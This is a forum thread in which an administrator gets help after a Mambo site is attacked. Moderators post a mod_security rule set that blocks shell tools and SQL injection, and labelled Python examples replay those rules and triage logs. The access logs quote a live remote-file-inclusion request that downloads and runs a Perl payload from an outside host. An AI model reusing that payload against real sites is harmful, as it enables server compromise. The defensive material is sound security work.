HowtoForge Forums > ISPConfig 2 > General

#11 | Grizzly (Member) | 16th July 2006, 13:34

This is after I blocked what you said before on the firewall and restarted the server. I have also blocked the IPs in .htaccess.

#12 | Ben (Moderator) | 16th July 2006, 13:39

For securing it you could use mod_security for Apache.
But be careful with that: a misconfigured mod_security causes e.g. phpMyAdmin to stop working, because it submits built queries via GET, which is disallowed in some mod_security howtos.

The next thing you can do is to disallow stuff like url_fopen wrappers in php.ini, because normally the admin should know if scripts need to get something from anywhere on the internet.

#13 | Grizzly (Member) | 16th July 2006, 22:09

Any idea on where to find good posts on mod_security for SUSE 10?

#14 | Ben (Moderator) | 17th July 2006, 08:11

On what? Installation or configuration?

That's an (undocumented) config example for mod_security:
Quote:
<IfModule mod_security.c>
#Start Engine
SecFilterEngine On
SecFilterDefaultAction "deny,log,status:404"
SecFilterScanPOST On

#Valid URL-Encoding
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On

#Unicode Encoding Check
SecFilterCheckUnicodeEncoding Off

SecFilterForceByteRange 1 255

#Logging
SecAuditEngine RelevantOnly
SecAuditLog /var/log/modsec_audit.log
SecFilterDebugLog /var/log/modsec_debug.log
SecFilterDebugLevel 0


SecServerSignature "."

#Enforce proper HTTP requests
#SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"

#check for bad meta characters in User-Agent field
SecFilterSelective HTTP_USER_AGENT ".*\'"

#Require Content-Length to be provided with every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

#Don't accept chunked encodings
SecFilterSelective HTTP_Transfer-Encoding "chunked"

#must have a useragent string
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

#Again, this is better protected by removing these functions in php.ini
SecFilterSelective ARGS "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

#Prevent path traversal (..) attacks
SecFilter "\.\./"

#generic recursion signature
SecFilterSelective THE_REQUEST "\.\./\.\./"

#generic attack sig
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"

#generic filter to prevent SQL injection attacks
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"

#generic PHP remote file inclusion attack
SecFilter "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "cmd=(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"

#generic sig for more bad PHP functions
SecFilterSelective THE_REQUEST "chr\(([0-9]{1,3})\)"
SecFilterSelective THE_REQUEST "chr\([0-9a-fA-Fx]+\)"

#SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

#SQL injection in cookies
SecFilterSelective COOKIE_sessionid ".*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*||\,]+[[:space:]]+(from|into|table|database|index|view)"
</IfModule>
That can be placed anywhere in your Apache config... Under Debian it makes sense to store that in a file in mods-available and link it into mods-enabled when it is used. Under SUSE I actually (and I don't mind) don't know the hundreds of files the config is split into and where best to put that...

Also you must load the module with something like
Quote:
LoadModule security_module /usr/lib/apache2/modules/mod_security.so
To disable that stuff for e.g. phpMyAdmin:
Quote:
<Directory /your/path/to/phpMyAdmin/>
<IfModule mod_security.c>
SecFilterEngine Off
</IfModule>
</Directory>
If you're not willing to apply those rules from above to _ALL_ your sites and to whitelist stuff like phpMyAdmin, it makes sense to apply that filter only to some dirs....

More on Installation and configuration can be found here: http://www.modsecurity.org/documenta...tml-multipage/
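Added example (not part of Ben's post, and not ModSecurity code): a few of the SecFilter signatures above replayed in Python against the Mambo request quoted further down in this thread and against a constructed phpMyAdmin-style request, to show why the chained RFI rule fires on the one and why the SQL filter breaks the other. Assumptions: Python's re module stands in for mod_security's PCRE engine, [[:space:]] is written as the Python whitespace class, matching is done case-insensitively, and the request line is URL-decoded before matching, as mod_security does when it normalises a request.

```python
"""Replay some of the posted mod_security 1.x SecFilter rules in Python.

Added example, not code from the forum post or from ModSecurity.  Python's
re module stands in for the PCRE engine mod_security used; [[:space:]] is
written as the whitespace class and matching is case-insensitive (an
assumption made for the demo).  ATTACK_REQUEST is the request line quoted
later in the thread; the other two request lines are constructed.
"""
import re
from urllib.parse import unquote_plus

# A rule is one pattern, or a list of patterns that all have to match
# (mod_security's `chain` keyword).  Patterns copied from the posted config.
RULES = {
    "path-traversal": r"\.\./",
    "generic-attack": r"cd\x20*\;(cd|\;|echo|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)",
    "rfi-chain": [
        r"\.php\?",
        r"(http|https|ftp)\:/",
        r"cmd=(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)",
    ],
    "generic-sqli": r"\s+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)\s+[A-Z|a-z|0-9|\*| |\,]+\s+(from|into|table|database|index|view)\s+[A-Z|a-z|0-9|\*| |\,]",
    "select-from": r"select.+from",
}


def evaluate(request_line):
    """Return the names of the rules that would fire on one raw request line."""
    # mod_security matched against the normalised (URL-decoded) request.
    decoded = unquote_plus(request_line)
    hits = []
    for name, patterns in RULES.items():
        if isinstance(patterns, str):
            patterns = [patterns]
        if all(re.search(p, decoded, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return hits


# The Mambo/Joomla remote-file-inclusion request quoted in the thread.
ATTACK_REQUEST = (
    "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS="
    "&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?"
    "&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;"
    "perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0"
)
# Constructed: the shape of what phpMyAdmin sends when it submits SQL via GET.
PHPMYADMIN_REQUEST = (
    "GET /phpMyAdmin/sql.php?db=test&table=users"
    "&sql_query=SELECT+*+FROM+users+WHERE+id%3D1 HTTP/1.1"
)
# Constructed: an ordinary Joomla page view.
BENIGN_REQUEST = "GET /index.php?option=com_content&Itemid=1 HTTP/1.0"

if __name__ == "__main__":
    for label, req in [("attack", ATTACK_REQUEST),
                       ("phpMyAdmin", PHPMYADMIN_REQUEST),
                       ("benign", BENIGN_REQUEST)]:
        hits = evaluate(req)
        # SecFilterDefaultAction "deny,log,status:404" turns any hit into a 404.
        print(f"{label:10s} {'deny (404)' if hits else 'allow':11s} {hits}")
```

The attack request is denied by the rfi-chain rule; the phpMyAdmin request is denied too, by the select.+from rule alone, which is exactly the breakage described in #12 and the reason for the <Directory> exemption above. Note also that the "generic attack sig" does not fire on this payload, because cd is followed by /tmp/ rather than directly by a semicolon, so the chained RFI rule is the one doing the real work here.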

#15 | falko (Super Moderator, Lüneburg, Germany) | 17th July 2006, 15:12

Quote:
Originally Posted by Grizzly
Any idea on where to find good posts on mod_security for SUSE 10?
Also take a look here: http://www.howtoforge.com/apache_mod_security

#16 | Grizzly (Member) | 17th July 2006, 22:13 | Attacks continue

I've now spent the last 48h reinstalling the entire server. I've done all of the above mentioned, except for the mod_security bit, but when I check my logfiles I find the following. I've redone the websites: the Mambo sites are now blank Joomla (latest stable version) sites until I get time to redo them. The only .htaccess files I can find lie in the stats folders; is this correct?
/var/log/httpd/ispconfig_access_log:

www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

and in /var/log/apache2/access_log for the same time

82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

and in /var/log/apache2/error_log at the same time

[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP

Is this a failed attempt or do I have reason to worry? I'm about to go out of my mind. Please help.
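Added example, not part of Grizzly's post: a small triage script that parses Apache combined-format access_log lines, decodes the query string, and reports any request in which a parameter value is an absolute URL (the remote-file-inclusion shape of mosConfig_absolute_path in the lines above), together with the shell commands carried in cmd and the hosts the payload fetches from. The first two log lines are the ones quoted above; the third is constructed as a benign control, and the set of command-carrying parameter names is an assumption.

```python
"""Triage Apache access_log lines for PHP remote-file-inclusion attempts.

Added example, not part of the original post.  The first two SAMPLE_LOG
lines are the ones quoted in the thread; the third is constructed as a
benign control.  COMMAND_PARAMS is an assumed list.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is an absolute URL: the classic RFI shape that
# allow_url_fopen lets include()/require() fetch and execute.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Any URL inside a value, used to harvest the hosts the payload pulls from.
URL_HOST_RE = re.compile(r'(?:https?|ftp)://([^/\s?;]+)', re.IGNORECASE)
# Parameter names used to carry shell commands (assumed; "cmd" is the one
# seen in the thread, extend as needed).
COMMAND_PARAMS = {"cmd"}

SAMPLE_LOG = """\
82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
10.0.0.5 - - [17/Jul/2006:21:25:00 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 17330 "-" "Mozilla/5.0"
"""


def split_query(query):
    """Decode the query string on '&' only; the cmd value itself contains ';'."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def triage_line(line):
    """Return a finding dict for an RFI / command-carrying request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    params = split_query(parts.query)
    rfi = [(k, v) for k, v in params if REMOTE_URL_RE.match(v)]
    commands = []
    for k, v in params:
        if k.lower() in COMMAND_PARAMS:
            commands.extend(c.strip() for c in v.split(";") if c.strip())
    if not rfi and not commands:
        return None
    hosts = sorted({h for _, v in params for h in URL_HOST_RE.findall(v)})
    return {
        "ip": rec["ip"],
        "time": rec["ts"],
        "path": parts.path,
        "status": int(rec["status"]),
        "rfi": rfi,             # (parameter, remote URL) pairs
        "commands": commands,   # shell commands split out of the cmd value
        "hosts": hosts,         # hosts to block outbound / hunt for in /tmp
    }


def triage_log(text):
    """Run triage_line over every line and keep only the findings."""
    return [f for f in map(triage_line, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']} status={finding['status']}")
        for param, url in finding["rfi"]:
            print(f"  RFI via {param} = {url}")
        for cmd in finding["commands"]:
            print(f"  cmd: {cmd}")
        print(f"  hosts: {', '.join(finding['hosts'])}")
```

A status 200 on such a request only means Apache handed it to PHP with the attacker's parameters; it does not prove the include succeeded. The practical follow-up is to look in /tmp for the downloaded a2.txt, check for stray perl processes, and block the listed hosts outbound, which is what the later replies about outbound firewalling and allow_url_fopen are about.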

#17 | TheRudy (Senior Member) | 17th July 2006, 22:20

Attacks continue because you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this Mambo site and the attacks will stop. Blocking 1 IP is kind of useless since they just change sites..

Again, REMOVE THE WEBSITE or update the website with a newer patch or something.. What version of Mambo CMS are you using?

#18 | todvard (Member) | 17th July 2006, 23:45

Just one thing to mention: it is good practice to enable and configure the firewall for outbound connections as well. If you had a good firewall script which allowed HTTP access only to trusted sites, then you wouldn't have to worry about those attacks.

#19 | edge (Moderator, The Netherlands) | 18th July 2006, 00:55

Quote:
Originally Posted by Grizzly
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
see: http://www.howtoforge.com/forums/sho...che2_php%22%5D

#20 | Ben (Moderator) | 18th July 2006, 08:25

Quote:
Originally Posted by todvard
Just one thing to mention: it is good practice to enable and configure the firewall for outbound connections as well. If you had a good firewall script which allowed HTTP access only to trusted sites, then you wouldn't have to worry about those attacks.
And don't forget to allow only some system users for some connections....


The next thing is to disable "allow_url_fopen" in php.ini to prevent any script from reading stuff from anywhere on the internet!